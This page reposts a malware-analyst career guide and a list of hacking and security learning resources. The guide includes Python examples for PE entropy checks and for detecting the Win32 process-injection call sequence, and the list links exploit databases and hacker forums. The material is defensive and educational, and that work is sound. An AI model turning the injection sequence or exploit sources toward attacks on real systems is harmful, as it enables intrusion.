As a construction worker needs to know how to use a hammer and a mechanic needs to know how to use a wrench, a Malware Analyst needs to know to work their own set of unique and powerful tools.  Some tools are easy to use and some are not, some have clear output and some dump you with lots of data that you need to be able to parse.  The tools of a Malware Analyst are incredibly important and usually one  of the first things learned. Here is a list of the types of tools required and some examples of them:

  • Disassembler – IDA Pro
  • Debugger – OllyDbg, WinDbg
  • System Monitor – Process Monitor, RegShot, Process Explorer
  • Network Monitor – TCPView, Wireshark
  • Packer Identifier – PEiD
  • Unpacking Tools – Qunpack, GUNPacker
  • Binary Analysis Tools – PE Explorer, Malcode Analysts Pack
  • Code Analysis Tools – LordPE, ImpRec

Once you learn how the tools work and what you could do with them, your quest in analyzing malware will become easier and easier. Also, keep in mind that while you might originally learn how to use a specific suite of tools, new tools are being developed all the time that might be more helpful in both their design and function.
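To make the packer identifier and binary analysis entries above concrete, here is an added example (written for this page, not code from the original article or from any of the tools listed): a minimal parser for the PE section table with a per-section entropy check. Entropy is the heuristic that packer identifiers use alongside their signature databases; a section whose raw bytes are close to random is usually compressed or encrypted. The PE bytes are constructed inline with a hypothetical `build_sample_pe` helper so the script runs offline without a real executable; the 7.0 bits-per-byte threshold is a common rule of thumb, not a standard.

```python
"""Added example: PE section-table parsing and an entropy-based packing heuristic."""
import math
import random
import struct

SECTION_HEADER_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)
COFF_HEADER_FMT = "<HHIIIHH"          # IMAGE_FILE_HEADER, 20 bytes
COFF_HEADER_SIZE = struct.calcsize(COFF_HEADER_FMT)


def shannon_entropy(data):
    """Bits per byte; 0.0 for empty input, 8.0 is the maximum for byte data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_pe(sections):
    """Construct a minimal PE image (hypothetical test helper, not a real linker):
    DOS header with e_lfanew, PE signature, COFF header, section table, raw data.
    SizeOfOptionalHeader is 0 here; a parser must read that field rather than
    assume a fixed optional-header size, which is what section_entropies does."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_HEADER_FMT, 0x8664, len(sections), 0, 0, 0, 0, 0x22)
    raw_ptr = e_lfanew + 4 + COFF_HEADER_SIZE + SECTION_HEADER_SIZE * len(sections)
    headers, bodies = [], []
    for name, data in sections:
        headers.append(struct.pack(SECTION_HEADER_FMT, name.ljust(8, b"\x00"),
                                   len(data), 0x1000, len(data), raw_ptr,
                                   0, 0, 0, 0, 0x60000020))
        bodies.append(data)
        raw_ptr += len(data)
    return dos + b"PE\x00\x00" + coff + b"".join(headers) + b"".join(bodies)


def section_entropies(pe):
    """Walk the section table and return [(section_name, entropy)].
    Headers are validated against the file size, because a malformed or
    deliberately misleading header is itself an analysis finding."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER_FMT, pe, coff_off)
    table_off = coff_off + COFF_HEADER_SIZE + opt_size
    results = []
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_HEADER_FMT, pe, table_off + i * SECTION_HEADER_SIZE)
        name = fields[0].rstrip(b"\x00").decode("ascii", "replace")
        raw_size, raw_ptr = fields[3], fields[4]   # SizeOfRawData, PointerToRawData
        if raw_ptr + raw_size > len(pe):
            raise ValueError(f"section {name} points outside the file")
        results.append((name, shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])))
    return results


def likely_packed(pe, threshold=7.0):
    """Names of sections whose raw bytes look compressed or encrypted."""
    return [name for name, ent in section_entropies(pe) if ent > threshold]


# Constructed sample: one repetitive text-like section beside one random section.
_rng = random.Random(1)
SAMPLE_PE = build_sample_pe([
    (b".text", b"hello world\n" * 300),
    (b".packed", bytes(_rng.getrandbits(8) for _ in range(4096))),
])

if __name__ == "__main__":
    for name, ent in section_entropies(SAMPLE_PE):
        print(f"{name:<8} {ent:.2f} bits/byte")
    print("likely packed:", likely_packed(SAMPLE_PE))
```

Real packer identifiers pair this with section names and entry-point byte signatures; entropy alone also flags legitimately compressed resources, so treat a hit as a reason to look closer, not as a verdict.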

Learn about malware

Learning about malware might seem a bit redundant when you are training to become a Malware Analyst; however, it is a very important aspect of your training. Malware evolves and changes every year; it uses new methods to infect and operate, and sometimes brings back old methods if they are applicable again. If you were writing a program to play Tic-Tac-Toe, you could try to write it from scratch, or you could see how other people have written it before and get an idea of what you need to do. The same applies to malware analysis: reading white papers and analysis reports about different types of malware will give you an idea of what you might be seeing while reversing.

Process injection is a method that malware uses to hide its operations. It must go through a set of functions in order to perform this technique, and it is important that you be able to identify it happening in the code based upon prior experience and knowledge of how malware works. Research, practice, knowledge and experience are key to being able to effectively analyze new malware and should be the staples of your Malware Analyst training.
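The "set of functions" the paragraph refers to is what an analyst looks for, both in disassembly and in a system monitor's trace. As an added example (not code from the original article), the script below matches the classic remote-thread injection sequence of Win32 calls, in order and against the same target, over a constructed API-call log of the kind a sandbox or Process Monitor session produces. The log format (`pid api target`) and the sample lines are assumptions made for this example.

```python
"""Added example: detect the classic process-injection call sequence in an API trace."""
from collections import defaultdict

# The ordered Win32 calls that classic remote-thread injection walks through:
# open a target process, allocate memory in it, write into it, start a thread there.
# Each step is matched in order, per (source process, target) pair.
INJECTION_SEQUENCE = (
    "OpenProcess",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "CreateRemoteThread",
)

# Constructed sample trace (not a real capture): "pid api target", "-" for no target.
SAMPLE_TRACE = """\
1200 CreateFileW -
1200 ReadFile -
4312 OpenProcess 1200
4312 VirtualAllocEx 1200
1200 WriteFile -
4312 WriteProcessMemory 1200
4312 CreateRemoteThread 1200
5000 OpenProcess 1200
5000 ReadProcessMemory 1200
"""


def parse_trace(text):
    """Yield (pid, api, target) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        pid, api, target = parts
        yield int(pid), api, target


def find_injection(trace_text):
    """Return (source_pid, target_pid) pairs for which the full sequence was
    observed in order. Interleaved unrelated calls (from this or other
    processes) do not reset progress, which is why a per-pair state machine
    is used instead of looking for four adjacent lines."""
    progress = defaultdict(int)      # (pid, target) -> index of next expected call
    hits = []
    for pid, api, target in parse_trace(trace_text):
        key = (pid, target)
        if api == INJECTION_SEQUENCE[progress[key]]:
            progress[key] += 1
            if progress[key] == len(INJECTION_SEQUENCE):
                hits.append((pid, int(target)))
                progress[key] = 0
    return hits


if __name__ == "__main__":
    for src, dst in find_injection(SAMPLE_TRACE):
        print(f"possible injection: pid {src} -> pid {dst}")
```

Process 5000 in the sample opens the same target but only reads its memory, which is what a legitimate debugger or inventory tool does, so it is not reported. Variants of the technique substitute other allocation or thread-creation APIs; the `INJECTION_SEQUENCE` table is the single place to extend when a white paper describes one.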

Helpful Links and Sources

There are many different ways to learn about becoming a Malware Analyst; some people choose to go through courses taught online or in person, which can cost upwards of a few thousand dollars. Other people choose to learn as they go, picking up information where they can and learning from their own experience. Both are decent ways of learning about malware analysis, but the cheap and easy way would be through doing online research and reading lots of books. Here is a list of my favorite sources for learning about malware analysis:

Online Sources:

Books:

Conclusion

Whether it is to start a new career or just simple curiosity, learning about Malware Analysis can be a very challenging and rewarding path. It can test your patience, concentration and sometimes even your temper, but the payoff when you have been working on a file for hours and finally come across the key function or piece of data you were looking for cannot be duplicated by anything else. The future holds a war between those who use malware and those who fight against it, and as technology advances, so too do the methods in which malware authors write programs to exploit and control it. The next generation of malware fighters will require a more advanced knowledge than ever before; they will be the cyber samurai.

Source: malwarebytes

80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker


Learning to become a hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for the simple hacking people do. Even to start doing the simplest hack on your own, a hacker needs to have in-depth knowledge of multiple topics. Some people recommend that minimum knowledge of a few programming languages like C, Python and HTML, along with Unix operating system concepts and networking knowledge, is required to start learning hacking techniques.

Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and a positive attitude towards problem solving. Security software is constantly evolving, and therefore you must keep learning new things at a really fast pace.

If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. I hope these free resources will help you speed up your learning. If you decide to pursue ethical hacking as a career option, you may also want to read some IN DEPTH ETHICAL HACKING BOOKS.

A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on the web. It's true that some common types of hacking can be easily done with the help of tools; however, doing so does not really make you a hacker. A true hacker is one who can find a vulnerability and develop a tool to exploit and/or demonstrate it.

Hacking is not only about knowing "how things work", but about knowing "why things work that way" and "how can we challenge it".

Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack.

Hacking For Dummies – Beginners Tutorials

These tutorials are not really simple for anyone who is just starting to learn hacking techniques. However, these should be a simple starting point for you. I am sure you have a different opinion about the complexity of each tutorial; however, advanced hackers are going to call this the job of a script kiddie (beginner hacker). Even to acquire the skills of a script kiddie you need to have a good understanding of computer fundamentals and programming.

  1. CYBRARY – For those looking to learn ethical hacking skills online, Cybrary provides the perfect platform to do so. Cybrary is a free online IT and cyber security training network that provides instruction in the form of self-paced, easy-to-follow videos. Featuring courses on topics such as Penetration Testing and Ethical Hacking, Advanced Penetration Testing, Post Exploitation Hacking and Computer and Hacking Forensics, Cybrary provides instruction from the beginner to the highly-advanced level of hacking. Additionally, Cybrary offers supplemental study material along with their courses free of charge. With their in-depth training videos and study guides, Cybrary ensures that users develop the best hacking skills.
  2. HACKING TUTORIALS FOR BEGINNERS – By BreakTheSecurity.com
  3. HOW TO LEARN ETHICAL HACKING – By Astalavista.com
  4. PENETRATION TESTING TUTORIAL – By Guru99.com
  5. BACKTRACK PENETRATION TESTING TUTORIAL
  6. INTRODUCTION TO PENETRATION TESTING
  7. INFORMATION GATHERING WITH NMAP
  8. SIMPLE HOW TO ARTICLES By Open Web Application Security
  9. THE SIX DUMBEST IDEAS IN COMPUTER SECURITY
  10. SECURE DESIGN PRINCIPLES
  11. 10 STEPS TO SECURE SOFTWARE

Cryptography Related Tutorials

Cryptography is a must-know topic for any aspiring security professional or ethical hacker. You must understand how encryption and decryption are done. You must understand why some of the old encryption techniques do not work in the modern computing world.

This is an important area, and a lot of software programmers and professionals do not understand it very well. Learning cryptography involves a good understanding of mathematics; this means you also need to have good fundamentals in discrete mathematics.

  1. INTRODUCTION TO PUBLIC KEY CRYPTOGRAPHY
  2. CRYPTO TUTORIAL
  3. INTRODUCTION TO CRYPTOGRAPHY
  4. AN OVERVIEW OF CRYPTOGRAPHY
  5. CRYPTOGRAPHY TUTORIALS – Herong’s Tutorial Examples
  6. THE CRYPTO TUTORIAL – Learn How to Keep Secret Secret
  7. INTRODUCTION TO CRYPTOLOGY, PART 1: BASIC CRYPTOLOGY CONCEPTS

Websites For Security Related Articles And News

These are some websites that you may find useful for finding hacking-related resources and articles. A lot of simple tricks and tips are available for experimenting through these sites, to improve yourself on the way to becoming an advanced hacker.

In recent years, many people have aspired to learn how to hack. With growing interest in this area, a lot of different types of hacking practices are evolving. With the popularity of social networks, many people have inclined towards vulnerabilities in various social networks like Facebook, Twitter and MySpace.

Continuous learning about the latest security issues, news and vulnerability reports is really important for any hacker or security professional. Some of the sites that keep publishing informative articles and news are listed here.

  1. HTTP://WWW.ASTALAVISTA.COM/
  2. HTTP://PACKETSTORMSECURITY.COM/
  3. HTTP://WWW.BLACKHAT.COM/
  4. HTTP://WWW.METASPLOIT.COM/
  5. HTTP://SECTOOLS.ORG/
  6. HTTP://WWW.2600.COM/
  7. DEF CON – HACKING CONFERENCE
  8. HTTP://WWW.BREAKTHESECURITY.COM/
  9. HTTP://WWW.HACKING-TUTORIAL.COM/
  10. HTTP://WWW.EVILZONE.ORG/
  11. HTTP://HACKADAY.COM/
  12. HTTP://WWW.HITB.ORG/
  13. HTTP://WWW.HACKTHISSITE.ORG/
  14. HTTP://PENTESTMAG.COM
  15. HTTP://WWW.SECURITYTUBE.NET/
  16. HTTPS://WWW.SSLLABS.COM/

EBooks And Whitepapers

Some of the research papers by security experts and gurus can provide you with a lot of information and inspiration. White papers can be really difficult to read and understand, therefore you may need to read them multiple times. Once you understand the topic well, reading will become much faster and you will be able to skim through a lot of content in less time.

  1. HANDBOOK OF APPLIED CRYPTOGRAPHY – This ebook contains some free chapters from one of the popular cryptography books. The full book is also available on Amazon at CRYPTOGRAPHY BOOK.
  2. NETWORK PENETRATION TESTING GUIDE
  3. HOW TO HACK ANYTHING IN JAVA
  4. MCAFEE ON IPHONE AND IPAD SECURITY
  5. A GOOD COLLECTION OF WHITE PAPERS ON SECURITY AND VULNERABILITIES – This site contains a collection of white papers from different sources, and some of these white papers are really worth referring to.
  6. ENGINEERING PRINCIPLES FOR INFORMATION TECHNOLOGY SECURITY
  7. BASIC PRINCIPLES OF INFORMATION PROTECTION
  8. OPEN WEB APPLICATION SECURITY PROJECT – OWASP is one of the most popular sites containing web application security related information.

Videos & Play Lists

For those who like to watch video tutorials, here are a few I liked. There are also many short videos available on YouTube. Feel free to explore more and share with us if you like something.

  1. CRYPTOGRAPHY COURSE By Dan Boneh Stanford University
  2. OPEN SECURITY TRAINING – YouTube playlist of more than 90 hours. I have found this to be the biggest free training available for security-related topics.
  3. OWASP APPSEC USA 2011: YouTube playlist containing a compilation of OWASP conference highlights from 2011.
  4. DEFCON: HOW I MET YOUR GIRLFRIEND – DEF CON is one of the most popular hacker conferences. The presenters at this conference are well known inside the hacking industry.
  5. DEFCON: WHAT HAPPENS WHEN YOU STEAL A HACKERS COMPUTER
  6. DEFCON: NMAP: SCANNING THE INTERNET
  7. PUBLIC KEY CRYPTOGRAPHY: Diffie-Hellman Key Exchange
  8. WEB APPLICATION PEN TESTING
  9. INTRO TO SCANNING NMAP, HPING, AMAP, TCPDUMP, METASPLOIT

Forums For Hackers And Security Professionals

Just like in any other area, forums are a really great help for learning from other experts. Hundreds of security experts and ethical/non-ethical hackers are willing to share their knowledge on forums for some reason. Please keep in mind to do enough research before posting a question, and be polite to the people who take time to answer your question.

  1. STACKOVERFLOW FOR SECURITY PROFESSIONALS
  2. HTTP://DARKSAT.X47.NET/
  3. HTTP://FORUMS.SECURITYINFOWATCH.COM/
  4. HTTP://FORUMS.CNET.COM/SPYWARE-VIRUSES-SECURITY-FORUM/
  5. HTTP://WWW.HACKFORUMS.NET/FORUMDISPLAY.PHP?FID=47

Vulnerability Databases And Resources

Vulnerability databases are the first place to start your day as a security professional. Newly detected vulnerabilities are generally made available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability.

  1. HTTP://WWW.EXPLOIT-DB.COM/
  2. HTTP://1337DAY.COM/
  3. HTTP://SECURITYVULNS.COM/
  4. HTTP://WWW.SECURITYFOCUS.COM/
  5. HTTP://WWW.OSVDB.ORG/
  6. HTTP://WWW.SECURITEAM.COM/
  7. HTTP://SECUNIA.COM/ADVISORIES/
  8. HTTP://INSECURE.ORG/SPLOITS_ALL.HTML
  9. HTTP://ZERODAYINITIATIVE.COM/ADVISORIES/PUBLISHED/
  10. HTTP://NMRC.ORG/PUB/INDEX.HTML
  11. HTTP://WEB.NVD.NIST.GOV
  12. HTTP://WWW.VUPEN.COM/ENGLISH/SECURITY-ADVISORIES/
  13. HTTP://WWW.VUPEN.COM/BLOG/
  14. HTTP://CVEDETAILS.COM/
  15. HTTP://WWW.RAPID7.COM/VULNDB/INDEX.JSP
  16. HTTP://OVAL.MITRE.ORG/

Product Specific Vulnerability Information

Some of the very popular products in the world require special attention, and therefore you may want to look at the specific security websites directly from the vendors. I have kept Linux, Microsoft and Apache in this list; however, it may apply to any product you are using heavily.

  1. RED HAT SECURITY AND OTHER UPDATES SITE
  2. MICROSOFT PRODUCTS SECURITY BULLETIN
  3. APACHE FOUNDATION PRODUCTS SECURITY REPOSITORY
  4. UBUNTU SOFTWARE SECURITY CENTER
  5. LINUX SECURITY REPOSITORY

Tools And Programs For Hacking / Security

There are dozens of tools available for doing different types of hacking and tests. Tools are really important for becoming more productive at your work. Some of the very common tools that are used by hackers are listed here. You may have a different choice of tools based on your own comfort.

  1. NMAP
  2. NSS
  3. HPING
  4. TCPDUMP
  5. METASPLOIT
  6. WIRESHARK
  7. NETWORK STUFF
  8. NIKTO

Summary

I have tried to compile some of these resources for my own reference for the learning journey I am going to start. I am not even at a beginner level of becoming a hacker, but the knowledge of this field really fascinates me and keeps me motivated to learn more and more. I hope I will be able to become successful in this.

A lot of people use their knowledge and skills for breaking stuff and stealing. I personally think that doing harm to someone is a weak choice and will not have a good ending. I would recommend not using your skills for any unethical endeavor. A single misuse of your skills may jeopardize your career, since most companies do a strict third-party background check before they hire an ethical hacker or security personnel.

There are dozens of companies looking for ethical hackers and security professionals. There is a really good number of opportunities in this area, and it is a really niche compensation segment. You will easily be able to get a decent job without even acquiring all the expert-level skills needed to become a pro hacker.

Source: fromdev.com